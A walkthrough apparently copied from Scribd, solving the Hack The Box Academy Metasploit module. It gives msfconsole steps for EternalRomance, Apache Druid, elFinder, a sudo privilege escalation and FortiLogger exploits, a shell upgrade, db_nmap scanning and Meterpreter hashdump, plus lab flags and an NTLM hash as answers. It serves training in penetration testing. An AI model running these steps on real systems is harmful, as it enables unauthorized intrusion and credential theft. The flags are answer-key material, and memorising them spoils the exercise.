Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
238 views19 pages

Using The Metasploit Framework

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
238 views19 pages

Using The Metasploit Framework

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 19

Using the Metasploit Framework:

Link to challenge: https://academy.hackthebox.com/module/39


(log in required)
Class: Tier 0 | Easy | Offensive

Introduction
Introduction to Metasploit:
Question: Which version of Metasploit comes equipped with a GUI interface?
Answer: Metasploit Pro
Method:

Question: What command do you use to interact with the free version of
Metasploit?
Answer: msfconsole
Method: ‘The msfconsole is probably the most popular interface to the Metasploit
Framework (MSF).’
MSF Components
Modules:
Question: Use the Metasploit-Framework to exploit the target with
EternalRomance. Find the flag.txt file on Administrator's desktop and submit
the contents as the answer.
Answer: HTB{MSF-W1nD0w5-3xPL01t4t10n}
Method: first lets open Metasploit on pwnbox:
msfconsole

*
*

We are in the Metasploit CLI.

In the CLI, lets search for ‘EternalRomance’ exploit.


Before we do – the exploit, known as ‘MS17-010’, exploits a vulnerability in
Windows SMB server, and obtain remote code exection:
search EternalRomance
There are 2 options – option #0 – exploit, and option #1 – auxiliary, which
means reconnaissance actions:
*from the section’s module:

*
We go for the exploit. Meaning we have to choose the #0 option:
use 0

Now we will enter ‘options’ to see what inputs we need to place:


options
We can see what is required and what is not required.
Some of the required properties are alreadu filled with default values such aas
‘LEAKATTEMPTS’ or ‘DBGTRACE’, we will keep them as such.

The local port (LPORT) and remote port (RPORT) are also preconfigured. They
will keep as well. The RPORT is preconfigured to port 445 – SMB port.

The local IP address (LHOST, also known as <attacker-IP>), and remote IP


address (RHOSTS, also known as <target-IP>) – those we will have to set to our
own pwnbox <attacker-IP>, and the provided target machine IP (<target-IP>).
So lets do just that:
set LHOST <attacker-IP>
set RHOSTS <target-IP>
When we are finished settings the values, it is a good practice to re-run
‘options’ to confirmed that all propertied are configured to the correct values.
We needed to set the correct attacker-IP and target-IP addresses in order to
obtain reverse shell that will grant us full control on the target machine.

Now that all is ready, lets run the exploit. We can use:
exploit
or
run
*There are no differences between those commands. *

We have a shell.

Now, as the shell session if of a windows machine, the session is ‘Meterpreter’,


a shell generated by the payload. But we will treat it as powershell (even
though it is not exactly), and paint the meterpreter commands in sea-blue.

First, lets run:


getuid
to determine out identity:

We are system! It means we can get the flag from the Adminnistrator’s
Desktop:
cat C:/Users/Administrator/Desktop/flag.txt

*note – in Windows paths the slash is often backward slash ‘\’, but often in
Meterpreter a forward slash will be used ‘/’, despite the machine being
Windows machine..

** here is some explanation about Meterpreter:


Payloads:
Question: Exploit the Apache Druid service and find the flag.txt file. Submit the
contents of this file as the answer.
Answer: HTB{MSF_Expl01t4t10n}
Method: lets enter Metasploit:
msfconsole

and in the CLI lets look for ‘Apache Druid:


search "Apache Druid"

We have several options, we go for #0


use 0

now, when running the options – we will see we need to set RHOSTS and
LHOST (options screenshot will not be displayed in this section as well as they
are redundant, neither in any coming sections, unless necessary):
set LHOST <attacker-IP>
set RHOSTS <target-IP>
and run the exploit
run
We have a shell! This time it is linux.
meterpreter on linux is a bit annoying, so lets get us a proper bash shell:

shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

We have a bash shell.

Lets confirm we are root first:

We are indeed root.


Now, Lets look for the flag:
find / -type f -name flag.txt 2>/dev/null

The flag is in ‘/root/flag.txt’. lets take it:


cat /root/flag.txt
MSF Sessions
Sessions:
Question: The target has a specific web application running that we can find by
looking into the HTML source code. What is the name of that web application?
Answer: elFinder
Method: lets enter the target machine IP in the browser URL:

We can see the web application name right in the tab.

*in the HTML source code it will appear in the ‘title’ tag – the tag responsible
for the tab’s content:

*
Question: Find the existing exploit in MSF and use it to get a shell on the target.
What is the username of the user you obtained a shell with?
Answer: www-data
Method: lets open Metasploit and look for ‘elFinder’:
msfconsole
search "elFinder"

We will go for exploit #3:


use 3

set RHOSTS and LHOST:


set LHOST <attacker-IP>
set RHOSTS <target-IP>

And run:
run
*
*

We have a shell!

A simple
getuid
will get us the machine’s user:

Question: The target system has an old version of Sudo running. Find the
relevant exploit and get root access to the target system. Find the flag.txt file
and submit the contents of it as the answer.
Answer: HTB{5e55ion5_4r3_sw33t}
Method: lets put the established meterpreter session in the background:
background
And lets search for sudo relates exploit:
search sudo

*
*

*
*

We will use exploit #29, and apply it on our meterpreter session:


use 29
set session 1
set LHOST <attacker-IP>

And run:
run

We have a second Meterpreter session. Lets investigate:

We are root!

Now, based on the assumption the flag is located at ‘/root’ as previous times:

*we can always use the technique we did at ‘Payloads’ section to established
bash shell, and find the flag. But I saw no need to repeat the process here as
well.*
Meterpreter:
Question: Find the existing exploit in MSF and use it to get a shell on the target.
What is the username of the user you obtained a shell with?
Answer: NT AUTHORITY\SYSTEM
Method: time to use a new technique – use Nmap within Metasploit.
We will use the service ‘postgresql’, lets see its current status:
sudo service postgresql status

Its inactive, lets start it:


sudo systemctl start postgresql

Now that it is running, lets initiliaze the msf-database:


sudo msfdb init

*
*
Now that the msf-database – lets run it:
sudo msfdb run

*
*

Now we have Metasploit console, equipped with the msf-database which is


capable to run nmap scan and store it.

The advantage of nmap within Metasploit over regular nmap – is that


Metasploit saves the captured services for further investigation.
(of course it isn’t necessary, and we can look manually the nmap results for
exploits to test on metasploit, but it is a nice feature)

Anyway, lets run the scan:


db_nmap -sV -p- -T5 -A <target-IP>

*
*
We don’t really need to look at the nmap scan result, as all of the results are
saved in the msf-database, lets take a look:
services

There are several services, we go for the IIS service (‘Internet Information
Services’ – basically windows apache/nginx). Lets open it in the browser:

The website is ‘FortiLogger’ web logger. Lets see if it has any vulnerabilities:
search FortiLogger

It does, it has one only which narrows down our selection space:
use 0

Lets set the attacker machine and target machine:


set RHOSTS <target-IP>
set LHOST <attacker-IP>
run

And we have a shell! Lets see what is our user

Its system!
Question: Retrieve the NTLM password hash for the "htb-student" user. Submit
the hash as the answer.
Answer: cf3a5525ee9414229e66279623ed5c58
Method: in the established meterpreter session – lets dump the hash:
hashdump

We go for the 4th line – ‘htb-student’, and take the last hash (separated with
colon).

You might also like